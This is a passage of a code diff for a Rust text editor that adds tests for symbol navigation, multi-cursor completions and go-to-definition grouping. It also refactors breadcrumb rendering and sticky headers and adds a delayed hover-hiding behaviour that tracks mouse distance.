+ async fn assert(offset: i8, before: &str, after: &str, cx: &mut EditorLspTestContext) {
+ let _state_context = cx.set_state(before);
+ cx.run_until_parked();
+ cx.update_editor(|editor, window, cx| editor.go_to_symbol_by_offset(window, cx, offset))
+ .await
+ .unwrap();
+ cx.run_until_parked();
+ cx.assert_editor_state(after);
+ }
+
+ const ABOVE: i8 = -1;
+ const BELOW: i8 = 1;
+
+ assert(
+ ABOVE,
+ indoc! {"
+ fn foo() {
+ // foo fn
+ }
+
+ ˇ// this zone is not inside any top level outline node
+
+ fn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ indoc! {"
+ ˇfn foo() {
+ // foo fn
+ }
+
+ // this zone is not inside any top level outline node
+
+ fn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ fn foo() {
+ // foo fn
+ }
+
+ ˇ// this zone is not inside any top level outline node
+
+ fn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ indoc! {"
+ fn foo() {
+ // foo fn
+ }
+
+ // this zone is not inside any top level outline node
+
+ ˇfn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ &mut cx,
+ )
+ .await;
+}
+
#[gpui::test]
async fn test_move_to_enclosing_bracket(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -19766,6 +20497,100 @@ async fn test_completions_with_additional_edits(cx: &mut TestAppContext) {
cx.assert_editor_state("fn main() { let a = Some(2)ˇ; }");
}
+#[gpui::test]
+async fn test_completions_with_additional_edits_and_multiple_cursors(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorLspTestContext::new_typescript(
+ lsp::ServerCapabilities {
+ completion_provider: Some(lsp::CompletionOptions {
+ resolve_provider: Some(true),
+ ..Default::default()
+ }),
+ ..Default::default()
+ },
+ cx,
+ )
+ .await;
+
+ cx.set_state(
+ "import { «Fooˇ» } from './types';\n\nclass Bar {\n method(): «Fooˇ» { return new Foo(); }\n}",
+ );
+
+ cx.simulate_keystroke("F");
+ cx.simulate_keystroke("o");
+
+ let completion_item = lsp::CompletionItem {
+ label: "FooBar".into(),
+ kind: Some(lsp::CompletionItemKind::CLASS),
+ text_edit: Some(lsp::CompletionTextEdit::Edit(lsp::TextEdit {
+ range: lsp::Range {
+ start: lsp::Position {
+ line: 3,
+ character: 14,
+ },
+ end: lsp::Position {
+ line: 3,
+ character: 16,
+ },
+ },
+ new_text: "FooBar".to_string(),
+ })),
+ additional_text_edits: Some(vec![lsp::TextEdit {
+ range: lsp::Range {
+ start: lsp::Position {
+ line: 0,
+ character: 9,
+ },
+ end: lsp::Position {
+ line: 0,
+ character: 11,
+ },
+ },
+ new_text: "FooBar".to_string(),
+ }]),
+ ..Default::default()
+ };
+
+ let closure_completion_item = completion_item.clone();
+ let mut request = cx.set_request_handler::<lsp::request::Completion, _, _>(move |_, _, _| {
+ let task_completion_item = closure_completion_item.clone();
+ async move {
+ Ok(Some(lsp::CompletionResponse::Array(vec![
+ task_completion_item,
+ ])))
+ }
+ });
+
+ request.next().await;
+
+ cx.condition(|editor, _| editor.context_menu_visible())
+ .await;
+ let apply_additional_edits = cx.update_editor(|editor, window, cx| {
+ editor
+ .confirm_completion(&ConfirmCompletion::default(), window, cx)
+ .unwrap()
+ });
+
+ cx.assert_editor_state(
+ "import { FooBarˇ } from './types';\n\nclass Bar {\n method(): FooBarˇ { return new Foo(); }\n}",
+ );
+
+ cx.set_request_handler::<lsp::request::ResolveCompletionItem, _, _>(move |_, _, _| {
+ let task_completion_item = completion_item.clone();
+ async move { Ok(task_completion_item) }
+ })
+ .next()
+ .await
+ .unwrap();
+
+ apply_additional_edits.await.unwrap();
+
+ cx.assert_editor_state(
+ "import { FooBarˇ } from './types';\n\nclass Bar {\n method(): FooBarˇ { return new Foo(); }\n}",
+ );
+}
+
#[gpui::test]
async fn test_completions_resolve_updates_labels_if_filter_text_matches(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -24203,6 +25028,163 @@ async fn test_goto_definition_no_fallback(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_goto_definition_close_ranges_open_singleton(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+ let mut cx = EditorLspTestContext::new_rust(
+ lsp::ServerCapabilities {
+ definition_provider: Some(lsp::OneOf::Left(true)),
+ ..lsp::ServerCapabilities::default()
+ },
+ cx,
+ )
+ .await;
+
+ // File content: 10 lines with functions defined on lines 3, 5, and 7 (0-indexed).
+ // With the default excerpt_context_lines of 2, ranges that are within
+ // 2 * 2 = 4 rows of each other should be grouped into one excerpt.
+ cx.set_state(
+ &r#"fn caller() {
+ let _ = ˇtarget();
+ }
+ fn target_a() {}
+
+ fn target_b() {}
+
+ fn target_c() {}
+ "#
+ .unindent(),
+ );
+
+ // Return two definitions that are close together (lines 3 and 5, gap of 2 rows)
+ cx.set_request_handler::<lsp::request::GotoDefinition, _, _>(move |url, _, _| async move {
+ Ok(Some(lsp::GotoDefinitionResponse::Array(vec![
+ lsp::Location {
+ uri: url.clone(),
+ range: lsp::Range::new(lsp::Position::new(3, 3), lsp::Position::new(3, 11)),
+ },
+ lsp::Location {
+ uri: url,
+ range: lsp::Range::new(lsp::Position::new(5, 3), lsp::Position::new(5, 11)),
+ },
+ ])))
+ });
+
+ let navigated = cx
+ .update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx))
+ .await
+ .expect("Failed to navigate to definitions");
+ assert_eq!(navigated, Navigated::Yes);
+
+ let editors = cx.update_workspace(|workspace, _, cx| {
+ workspace.items_of_type::<Editor>(cx).collect::<Vec<_>>()
+ });
+ cx.update_editor(|_, _, _| {
+ assert_eq!(
+ editors.len(),
+ 1,
+ "Close ranges should navigate in-place without opening a new editor"
+ );
+ });
+
+ // Both target ranges should be selected
+ cx.assert_editor_state(
+ &r#"fn caller() {
+ let _ = target();
+ }
+ fn «target_aˇ»() {}
+
+ fn «target_bˇ»() {}
+
+ fn target_c() {}
+ "#
+ .unindent(),
+ );
+}
+
+#[gpui::test]
+async fn test_goto_definition_far_ranges_open_multibuffer(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+ let mut cx = EditorLspTestContext::new_rust(
+ lsp::ServerCapabilities {
+ definition_provider: Some(lsp::OneOf::Left(true)),
+ ..lsp::ServerCapabilities::default()
+ },
+ cx,
+ )
+ .await;
+
+ // Create a file with definitions far apart (more than 2 * excerpt_context_lines rows).
+ cx.set_state(
+ &r#"fn caller() {
+ let _ = ˇtarget();
+ }
+ fn target_a() {}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ fn target_b() {}
+ "#
+ .unindent(),
+ );
+
+ // Return two definitions that are far apart (lines 3 and 19, gap of 16 rows)
+ cx.set_request_handler::<lsp::request::GotoDefinition, _, _>(move |url, _, _| async move {
+ Ok(Some(lsp::GotoDefinitionResponse::Array(vec![
+ lsp::Location {
+ uri: url.clone(),
+ range: lsp::Range::new(lsp::Position::new(3, 3), lsp::Position::new(3, 11)),
+ },
+ lsp::Location {
+ uri: url,
+ range: lsp::Range::new(lsp::Position::new(19, 3), lsp::Position::new(19, 11)),
+ },
+ ])))
+ });
+
+ let navigated = cx
+ .update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx))
+ .await
+ .expect("Failed to navigate to definitions");
+ assert_eq!(navigated, Navigated::Yes);
+
+ let editors = cx.update_workspace(|workspace, _, cx| {
+ workspace.items_of_type::<Editor>(cx).collect::<Vec<_>>()
+ });
+ cx.update_editor(|_, _, test_editor_cx| {
+ assert_eq!(
+ editors.len(),
+ 2,
+ "Far apart ranges should open a new multibuffer editor"
+ );
+ let multibuffer_editor = editors
+ .into_iter()
+ .find(|editor| *editor != test_editor_cx.entity())
+ .expect("Should have a multibuffer editor");
+ let multibuffer_text = multibuffer_editor.read(test_editor_cx).text(test_editor_cx);
+ assert!(
+ multibuffer_text.contains("target_a"),
+ "Multibuffer should contain the first definition"
+ );
+ assert!(
+ multibuffer_text.contains("target_b"),
+ "Multibuffer should contain the second definition"
+ );
+ });
+}
+
#[gpui::test]
async fn test_find_all_references_editor_reuse(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -41,26 +41,23 @@ use git::{Oid, blame::BlameEntry, commit::ParsedCommitMessage, status::FileStatu
use gpui::{
Action, Along, AnyElement, App, AppContext, AvailableSpace, Axis as ScrollbarAxis, BorderStyle,
Bounds, ClickEvent, ClipboardItem, ContentMask, Context, Corner, Corners, CursorStyle,
- DispatchPhase, Edges, Element, ElementInputHandler, Entity, Focusable as _, FontId, FontWeight,
- GlobalElementId, Hitbox, HitboxBehavior, Hsla, InteractiveElement, IntoElement, IsZero,
- KeybindingKeystroke, Length, Modifiers, ModifiersChangedEvent, MouseButton, MouseClickEvent,
- MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, PaintQuad, ParentElement,
- Pixels, PressureStage, ScrollDelta, ScrollHandle, ScrollWheelEvent, ShapedLine, SharedString,
- Size, StatefulInteractiveElement, Style, Styled, StyledText, TextAlign, TextRun,
- TextStyleRefinement, WeakEntity, Window, anchored, deferred, div, fill, linear_color_stop,
- linear_gradient, outline, pattern_slash, point, px, quad, relative, size, solid_background,
- transparent_black,
+ DispatchPhase, Edges, Element, ElementInputHandler, Entity, Focusable as _, Font, FontId,
+ FontWeight, GlobalElementId, Hitbox, HitboxBehavior, Hsla, InteractiveElement, IntoElement,
+ IsZero, Length, Modifiers, ModifiersChangedEvent, MouseButton, MouseClickEvent, MouseDownEvent,
+ MouseMoveEvent, MousePressureEvent, MouseUpEvent, PaintQuad, ParentElement, Pixels,
+ PressureStage, ScrollDelta, ScrollHandle, ScrollWheelEvent, ShapedLine, SharedString, Size,
+ StatefulInteractiveElement, Style, Styled, StyledText, TextAlign, TextRun, TextStyleRefinement,
+ WeakEntity, Window, anchored, deferred, div, fill, linear_color_stop, linear_gradient, outline,
+ pattern_slash, point, px, quad, relative, size, solid_background, transparent_black,
};
use itertools::Itertools;
-use language::{IndentGuideSettings, language_settings::ShowWhitespaceSetting};
+use language::{HighlightedText, IndentGuideSettings, language_settings::ShowWhitespaceSetting};
use markdown::Markdown;
use multi_buffer::{
Anchor, ExcerptId, ExcerptInfo, ExpandExcerptDirection, ExpandInfo, MultiBufferPoint,
MultiBufferRow, RowInfo,
};
-use edit_prediction_types::EditPredictionGranularity;
-
use project::{
DisableAiSettings, Entry, ProjectPath,
debugger::breakpoint_store::{Breakpoint, BreakpointSessionState},
@@ -98,7 +95,7 @@ use util::{RangeExt, ResultExt, debug_panic};
use workspace::{
CollaboratorId, ItemHandle, ItemSettings, OpenInTerminal, OpenTerminal, RevealInProjectPanel,
Workspace,
- item::{BreadcrumbText, Item, ItemBufferKind},
+ item::{Item, ItemBufferKind},
};
/// Determines what kinds of highlights should be applied to a lines background.
@@ -540,6 +537,8 @@ impl EditorElement {
register_action(editor, window, Editor::go_to_next_change);
register_action(editor, window, Editor::go_to_prev_reference);
register_action(editor, window, Editor::go_to_next_reference);
+ register_action(editor, window, Editor::go_to_previous_symbol);
+ register_action(editor, window, Editor::go_to_next_symbol);
register_action(editor, window, |editor, action, window, cx| {
if let Some(task) = editor.format(action, window, cx) {
@@ -651,6 +650,7 @@ impl EditorElement {
register_action(editor, window, Editor::enable_breakpoint);
register_action(editor, window, Editor::disable_breakpoint);
register_action(editor, window, Editor::toggle_read_only);
+ register_action(editor, window, Editor::align_selections);
if editor.read(cx).enable_wrap_selections_in_tag(cx) {
register_action(editor, window, Editor::wrap_selections_in_tag);
}
@@ -1243,7 +1243,7 @@ impl EditorElement {
let gutter_hitbox = &position_map.gutter_hitbox;
let modifiers = event.modifiers;
let text_hovered = text_hitbox.is_hovered(window);
- let gutter_hovered = gutter_hitbox.bounds.contains(&event.position);
+ let gutter_hovered = gutter_hitbox.is_hovered(window);
editor.set_gutter_hovered(gutter_hovered, cx);
editor.show_mouse_cursor(cx);
@@ -1462,6 +1462,7 @@ impl EditorElement {
if text_hovered {
editor.update_hovered_link(
point_for_position,
+ Some(event.position),
&position_map.snapshot,
modifiers,
window,
@@ -1473,12 +1474,13 @@ impl EditorElement {
.snapshot
.buffer_snapshot()
.anchor_before(point.to_offset(&position_map.snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx);
+ hover_at(editor, Some(anchor), Some(event.position), window, cx);
Self::update_visible_cursor(editor, point, position_map, window, cx);
} else {
editor.update_inlay_link_and_hover_points(
&position_map.snapshot,
point_for_position,
+ Some(event.position),
modifiers.secondary(),
modifiers.shift,
window,
@@ -1487,7 +1489,7 @@ impl EditorElement {
}
} else {
editor.hide_hovered_link(cx);
- hover_at(editor, None, window, cx);
+ hover_at(editor, None, Some(event.position), window, cx);
}
}
@@ -3275,9 +3277,9 @@ impl EditorElement {
snapshot.display_point_to_point(DisplayPoint::new(range.end, 0), Bias::Right);
editor
- .tasks
- .iter()
- .filter_map(|(_, tasks)| {
+ .runnables
+ .all_runnables()
+ .filter_map(|tasks| {
let multibuffer_point = tasks.offset.to_point(&snapshot.buffer_snapshot());
if multibuffer_point < offset_range_start
|| multibuffer_point > offset_range_end
@@ -4595,7 +4597,6 @@ impl EditorElement {
let mut lines = Vec::<StickyHeaderLine>::new();
for StickyHeader {
- item,
sticky_row,
start_point,
offset,
@@ -4635,7 +4636,6 @@ impl EditorElement {
line_height * offset as f32,
line,
line_number,
- item.range.start,
line_height,
scroll_pixel_position,
content_origin,
@@ -4701,7 +4701,6 @@ impl EditorElement {
end_rows.push(end_row);
rows.push(StickyHeader {
- item: item.clone(),
sticky_row,
start_point,
offset,
@@ -4833,17 +4832,11 @@ impl EditorElement {
let edit_prediction = if edit_prediction_popover_visible {
self.editor.update(cx, move |editor, cx| {
- let accept_binding = editor.accept_edit_prediction_keybind(
- EditPredictionGranularity::Full,
- window,
- cx,
- );
let mut element = editor.render_edit_prediction_cursor_popover(
min_width,
max_width,
cursor_point,
style,
- accept_binding.keystroke(),
window,
cx,
)?;
@@ -6705,22 +6698,33 @@ impl EditorElement {
}
});
+ let position_map = layout.position_map.clone();
+
for (line_index, line) in sticky_headers.lines.iter().enumerate() {
let editor = self.editor.clone();
let hitbox = line.hitbox.clone();
- let target_anchor = line.target_anchor;
+ let row = line.row;
+ let line_layout = line.line.clone();
+ let position_map = position_map.clone();
window.on_mouse_event(move |event: &MouseDownEvent, phase, window, cx| {
if !phase.bubble() {
return;
}
if event.button == MouseButton::Left && hitbox.is_hovered(window) {
+ let point_for_position =
+ position_map.point_for_position_on_line(event.position, row, &line_layout);
+
editor.update(cx, |editor, cx| {
+ let snapshot = editor.snapshot(window, cx);
+ let anchor = snapshot
+ .display_snapshot
+ .display_point_to_anchor(point_for_position.previous_valid, Bias::Left);
editor.change_selections(
SelectionEffects::scroll(Autoscroll::top_relative(line_index)),
window,
cx,
- |selections| selections.select_ranges([target_anchor..target_anchor]),
+ |selections| selections.select_ranges([anchor..anchor]),
);
cx.stop_propagation();
});
@@ -7911,7 +7915,8 @@ impl EditorElement {
}
pub fn render_breadcrumb_text(
- mut segments: Vec<BreadcrumbText>,
+ mut segments: Vec<HighlightedText>,
+ breadcrumb_font: Option<Font>,
prefix: Option<gpui::AnyElement>,
active_item: &dyn ItemHandle,
multibuffer_header: bool,
@@ -7931,17 +7936,16 @@ pub fn render_breadcrumb_text(
if suffix_start_ix > prefix_end_ix {
segments.splice(
prefix_end_ix..suffix_start_ix,
- Some(BreadcrumbText {
+ Some(HighlightedText {
text: "⋯".into(),
- highlights: None,
- font: None,
+ highlights: vec![],
}),
);
}
let highlighted_segments = segments.into_iter().enumerate().map(|(index, segment)| {
let mut text_style = window.text_style();
- if let Some(ref font) = segment.font {
+ if let Some(font) = &breadcrumb_font {
text_style.font_family = font.family.clone();
text_style.font_features = font.features.clone();
text_style.font_style = font.style;
@@ -7958,7 +7962,7 @@ pub fn render_breadcrumb_text(
}
StyledText::new(segment.text.replace('\n', " "))
- .with_default_highlights(&text_style, segment.highlights.unwrap_or_default())
+ .with_default_highlights(&text_style, segment.highlights)
.into_any()
});
@@ -8068,13 +8072,13 @@ pub fn render_breadcrumb_text(
}
fn apply_dirty_filename_style(
- segment: &BreadcrumbText,
+ segment: &HighlightedText,
text_style: &gpui::TextStyle,
cx: &App,
) -> Option<gpui::AnyElement> {
let text = segment.text.replace('\n', " ");
- let filename_position = std::path::Path::new(&segment.text)
+ let filename_position = std::path::Path::new(segment.text.as_ref())
.file_name()
.and_then(|f| {
let filename_str = f.to_string_lossy();
@@ -8444,8 +8448,12 @@ pub(crate) fn render_buffer_header(
el.child(Icon::new(IconName::FileLock).color(Color::Muted))
})
.when_some(breadcrumbs, |then, breadcrumbs| {
+ let font = theme::ThemeSettings::get_global(cx)
+ .buffer_font
+ .clone();
then.child(render_breadcrumb_text(
breadcrumbs,
+ Some(font),
None,
editor_handle,
true,
@@ -8609,21 +8617,6 @@ pub(crate) fn render_buffer_header(
})
}
-pub struct AcceptEditPredictionBinding(pub(crate) Option<gpui::KeyBinding>);
-
-impl AcceptEditPredictionBinding {
- pub fn keystroke(&self) -> Option<&KeybindingKeystroke> {
- if let Some(binding) = self.0.as_ref() {
- match &binding.keystrokes() {
- [keystroke, ..] => Some(keystroke),
- _ => None,
- }
- } else {
- None
- }
- }
-}
-
fn prepaint_gutter_button(
mut button: AnyElement,
row: DisplayRow,
@@ -9538,7 +9531,7 @@ impl EditorRequestLayoutState {
}
}
- fn can_prepaint(&self) -> bool {
+ fn has_remaining_prepaint_depth(&self) -> bool {
self.prepaint_depth.get() < Self::MAX_PREPAINT_DEPTH
}
}
@@ -10251,29 +10244,21 @@ impl Element for EditorElement {
}
})
});
- if new_renderer_widths.is_some_and(|new_renderer_widths| {
- self.editor.update(cx, |editor, cx| {
- editor.update_renderer_widths(new_renderer_widths, cx)
- })
- }) {
- // If the fold widths have changed, we need to prepaint
- // the element again to account for any changes in
- // wrapping.
- if request_layout.can_prepaint() {
- return self.prepaint(
- None,
- _inspector_id,
- bounds,
- request_layout,
- window,
- cx,
- );
- } else {
- debug_panic!(concat!(
- "skipping recursive prepaint at max depth. ",
- "renderer widths may be stale."
- ));
- }
+ let renderer_widths_changed = request_layout.has_remaining_prepaint_depth()
+ && new_renderer_widths.is_some_and(|new_renderer_widths| {
+ self.editor.update(cx, |editor, cx| {
+ editor.update_renderer_widths(new_renderer_widths, cx)
+ })
+ });
+ if renderer_widths_changed {
+ return self.prepaint(
+ None,
+ _inspector_id,
+ bounds,
+ request_layout,
+ window,
+ cx,
+ );
}
let longest_line_blame_width = self
@@ -10389,14 +10374,14 @@ impl Element for EditorElement {
resized_blocks,
} = blocks;
if let Some(resized_blocks) = resized_blocks {
- self.editor.update(cx, |editor, cx| {
- editor.resize_blocks(
- resized_blocks,
- autoscroll_request.map(|(autoscroll, _)| autoscroll),
- cx,
- )
- });
- if request_layout.can_prepaint() {
+ if request_layout.has_remaining_prepaint_depth() {
+ self.editor.update(cx, |editor, cx| {
+ editor.resize_blocks(
+ resized_blocks,
+ autoscroll_request.map(|(autoscroll, _)| autoscroll),
+ cx,
+ )
+ });
return self.prepaint(
None,
_inspector_id,
@@ -10406,10 +10391,10 @@ impl Element for EditorElement {
cx,
);
} else {
- debug_panic!(concat!(
- "skipping recursive prepaint at max depth. ",
- "block layout may be stale."
- ));
+ debug_panic!(
+ "dropping block resize because prepaint depth \
+ limit was reached"
+ );
}
}
@@ -11284,11 +11269,10 @@ struct StickyHeaders {
struct StickyHeaderLine {
row: DisplayRow,
offset: Pixels,
- line: LineWithInvisibles,
+ line: Rc<LineWithInvisibles>,
line_number: Option<ShapedLine>,
elements: SmallVec<[AnyElement; 1]>,
available_text_width: Pixels,
- target_anchor: Anchor,
hitbox: Hitbox,
}
@@ -11346,7 +11330,7 @@ impl StickyHeaders {
},
);
- window.set_cursor_style(CursorStyle::PointingHand, &line.hitbox);
+ window.set_cursor_style(CursorStyle::IBeam, &line.hitbox);
}
}
}
@@ -11357,7 +11341,6 @@ impl StickyHeaderLine {
offset: Pixels,
mut line: LineWithInvisibles,
line_number: Option<ShapedLine>,
- target_anchor: Anchor,
line_height: Pixels,
scroll_pixel_position: gpui::Point<ScrollPixelOffset>,
content_origin: gpui::Point<Pixels>,
@@ -11387,11 +11370,10 @@ impl StickyHeaderLine {
Self {
row,
offset,
- line,
+ line: Rc::new(line),
line_number,
elements,
available_text_width,
- target_anchor,
hitbox: window.insert_hitbox(hitbox_bounds, HitboxBehavior::BlockMouseExceptScroll),
}
}
@@ -11973,6 +11955,41 @@ impl PositionMap {
column_overshoot_after_line_end,
}
}
+
+ fn point_for_position_on_line(
+ &self,
+ position: gpui::Point<Pixels>,
+ row: DisplayRow,
+ line: &LineWithInvisibles,
+ ) -> PointForPosition {
+ let text_bounds = self.text_hitbox.bounds;
+ let scroll_position = self.snapshot.scroll_position();
+ let position = position - text_bounds.origin;
+ let x = position.x + (scroll_position.x as f32 * self.em_layout_width);
+
+ let alignment_offset = line.alignment_offset(self.text_align, self.content_width);
+ let x_relative_to_text = x - alignment_offset;
+ let (column, x_overshoot_after_line_end) =
+ if let Some(ix) = line.index_for_x(x_relative_to_text) {
+ (ix as u32, px(0.))
+ } else {
+ (line.len as u32, px(0.).max(x_relative_to_text - line.width))
+ };
+
+ let mut exact_unclipped = DisplayPoint::new(row, column);
+ let previous_valid = self.snapshot.clip_point(exact_unclipped, Bias::Left);
+ let next_valid = self.snapshot.clip_point(exact_unclipped, Bias::Right);
+
+ let column_overshoot_after_line_end =
+ (x_overshoot_after_line_end / self.em_layout_width) as u32;
+ *exact_unclipped.column_mut() += column_overshoot_after_line_end;
+ PointForPosition {
+ previous_valid,
+ next_valid,
+ exact_unclipped,
+ column_overshoot_after_line_end,
+ }
+ }
}
pub(crate) struct BlockLayout {
@@ -12309,7 +12326,6 @@ impl HighlightedRange {
}
pub(crate) struct StickyHeader {
- pub item: language::OutlineItem<Anchor>,
pub sticky_row: DisplayRow,
pub start_point: Point,
pub offset: ScrollOffset,
@@ -13,7 +13,7 @@ impl Editor {
_window: &Window,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() || !self.use_document_folding_ranges {
+ if !self.lsp_data_enabled() || !self.use_document_folding_ranges {
return;
}
let Some(project) = self.project.clone() else {
@@ -4,7 +4,7 @@ use crate::{
HighlightKey, Navigated, PointForPosition, SelectPhase,
editor_settings::GoToDefinitionFallback, scroll::ScrollAmount,
};
-use gpui::{App, AsyncWindowContext, Context, Entity, Modifiers, Task, Window, px};
+use gpui::{App, AsyncWindowContext, Context, Entity, Modifiers, Pixels, Task, Window, px};
use language::{Bias, ToOffset};
use linkify::{LinkFinder, LinkKind};
use lsp::LanguageServerId;
@@ -113,6 +113,7 @@ impl Editor {
pub(crate) fn update_hovered_link(
&mut self,
point_for_position: PointForPosition,
+ mouse_position: Option<gpui::Point<Pixels>>,
snapshot: &EditorSnapshot,
modifiers: Modifiers,
window: &mut Window,
@@ -138,6 +139,7 @@ impl Editor {
self.update_inlay_link_and_hover_points(
snapshot,
point_for_position,
+ mouse_position,
hovered_link_modifier,
modifiers.shift,
window,
@@ -8,10 +8,10 @@ use crate::{
};
use anyhow::Context as _;
use gpui::{
- AnyElement, AsyncWindowContext, Context, Entity, Focusable as _, FontWeight, Hsla,
+ AnyElement, App, AsyncWindowContext, Bounds, Context, Entity, Focusable as _, FontWeight, Hsla,
InteractiveElement, IntoElement, MouseButton, ParentElement, Pixels, ScrollHandle, Size,
StatefulInteractiveElement, StyleRefinement, Styled, Subscription, Task, TextStyleRefinement,
- Window, div, px,
+ Window, canvas, div, px,
};
use itertools::Itertools;
use language::{DiagnosticEntry, Language, LanguageRegistry};
@@ -20,7 +20,10 @@ use markdown::{Markdown, MarkdownElement, MarkdownStyle};
use multi_buffer::{MultiBufferOffset, ToOffset, ToPoint};
use project::{HoverBlock, HoverBlockKind, InlayHintLabelPart};
use settings::Settings;
-use std::{borrow::Cow, cell::RefCell};
+use std::{
+ borrow::Cow,
+ cell::{Cell, RefCell},
+};
use std::{ops::Range, sync::Arc, time::Duration};
use std::{path::PathBuf, rc::Rc};
use theme::ThemeSettings;
@@ -45,6 +48,7 @@ pub fn hover(editor: &mut Editor, _: &Hover, window: &mut Window, cx: &mut Conte
pub fn hover_at(
editor: &mut Editor,
anchor: Option<Anchor>,
+ mouse_position: Option<gpui::Point<Pixels>>,
window: &mut Window,
cx: &mut Context<Editor>,
) {
@@ -52,10 +56,32 @@ pub fn hover_at(
if show_keyboard_hover(editor, window, cx) {
return;
}
+
if let Some(anchor) = anchor {
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
show_hover(editor, anchor, false, window, cx);
} else {
- hide_hover(editor, cx);
+ let mut getting_closer = false;
+ if let Some(mouse_position) = mouse_position {
+ getting_closer = editor.hover_state.is_mouse_getting_closer(mouse_position);
+ }
+
+ // If we are moving away and a timer is already running, just let it count down.
+ if !getting_closer && editor.hover_state.hiding_delay_task.is_some() {
+ return;
+ }
+
+ // If we are moving closer, or if no timer is running at all, start/restart the 300ms timer.
+ let delay = Duration::from_millis(300u64);
+ let task = cx.spawn(async move |this, cx| {
+ cx.background_executor().timer(delay).await;
+ this.update(cx, |editor, cx| {
+ hide_hover(editor, cx);
+ })
+ .ok();
+ });
+ editor.hover_state.hiding_delay_task = Some(task);
}
}
}
@@ -156,6 +182,9 @@ pub fn hover_at_inlay(
let hover_popover_delay = EditorSettings::get_global(cx).hover_popover_delay.0;
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
+
let task = cx.spawn_in(window, async move |this, cx| {
async move {
cx.background_executor()
@@ -187,6 +216,7 @@ pub fn hover_at_inlay(
scroll_handle,
keyboard_grace: Rc::new(RefCell::new(false)),
anchor: None,
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
};
@@ -216,6 +246,8 @@ pub fn hide_hover(editor: &mut Editor, cx: &mut Context<Editor>) -> bool {
editor.hover_state.info_task = None;
editor.hover_state.triggered_from = None;
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
editor.clear_background_highlights(HighlightKey::HoverState, cx);
@@ -254,6 +286,9 @@ fn show_hover(
.map(|project| project.read(cx).languages().clone());
let provider = editor.semantics_provider.clone()?;
+ editor.hover_state.hiding_delay_task = None;
+ editor.hover_state.closest_mouse_distance = None;
+
if !ignore_timeout {
if same_info_hover(editor, &snapshot, anchor)
|| same_diagnostic_hover(editor, &snapshot, anchor)
@@ -398,6 +433,7 @@ fn show_hover(
background_color,
keyboard_grace: Rc::new(RefCell::new(ignore_timeout)),
anchor,
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
})
} else {
@@ -466,6 +502,7 @@ fn show_hover(
scroll_handle,
keyboard_grace: Rc::new(RefCell::new(ignore_timeout)),
anchor: Some(anchor),
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
})
}
@@ -507,6 +544,7 @@ fn show_hover(
scroll_handle,
keyboard_grace: Rc::new(RefCell::new(ignore_timeout)),
anchor: Some(anchor),
+ last_bounds: Rc::new(Cell::new(None)),
_subscription: subscription,
});
}
@@ -778,6 +816,8 @@ pub struct HoverState {
pub diagnostic_popover: Option<DiagnosticPopover>,
pub triggered_from: Option<Anchor>,
pub info_task: Option<Task<Option<()>>>,
+ pub closest_mouse_distance: Option<Pixels>,
+ pub hiding_delay_task: Option<Task<()>>,
}
impl HoverState {
@@ -785,6 +825,60 @@ impl HoverState {
!self.info_popovers.is_empty() || self.diagnostic_popover.is_some()
}
+ pub fn is_mouse_getting_closer(&mut self, mouse_position: gpui::Point<Pixels>) -> bool {
+ if !self.visible() {
+ return false;
+ }
+
+ let mut popover_bounds = Vec::new();
+ for info_popover in &self.info_popovers {
+ if let Some(bounds) = info_popover.last_bounds.get() {
+ popover_bounds.push(bounds);
+ }
+ }
+ if let Some(diagnostic_popover) = &self.diagnostic_popover {
+ if let Some(bounds) = diagnostic_popover.last_bounds.get() {
+ popover_bounds.push(bounds);
+ }
+ }
+
+ if popover_bounds.is_empty() {
+ return false;
+ }
+
+ let distance = popover_bounds
+ .iter()
+ .map(|bounds| self.distance_from_point_to_bounds(mouse_position, *bounds))
+ .min_by(|a, b| a.partial_cmp(b).unwrap_or(std::cmp::Ordering::Equal))
+ .unwrap_or(px(f32::MAX));
+
+ if let Some(closest_distance) = self.closest_mouse_distance {
+ if distance > closest_distance + px(4.0) {
+ return false;
+ }
+ }
+
+ self.closest_mouse_distance =
+ Some(distance.min(self.closest_mouse_distance.unwrap_or(distance)));
+ true
+ }
+
+ fn distance_from_point_to_bounds(
+ &self,
+ point: gpui::Point<Pixels>,
+ bounds: Bounds<Pixels>,
+ ) -> Pixels {
+ let center_x = bounds.origin.x + bounds.size.width / 2.;
+ let center_y = bounds.origin.y + bounds.size.height / 2.;
+ let dx: f32 = ((point.x - center_x).abs() - bounds.size.width / 2.)
+ .max(px(0.0))
+ .into();
+ let dy: f32 = ((point.y - center_y).abs() - bounds.size.height / 2.)
+ .max(px(0.0))
+ .into();
+ px((dx.powi(2) + dy.powi(2)).sqrt())
+ }
+
pub(crate) fn render(
&mut self,
snapshot: &EditorSnapshot,
@@ -887,6 +981,7 @@ pub struct InfoPopover {
pub scroll_handle: ScrollHandle,
pub keyboard_grace: Rc<RefCell<bool>>,
pub anchor: Option<Anchor>,
+ pub last_bounds: Rc<Cell<Option<Bounds<Pixels>>>>,
_subscription: Option<Subscription>,
}
@@ -898,13 +993,36 @@ impl InfoPopover {
cx: &mut Context<Editor>,
) -> AnyElement {
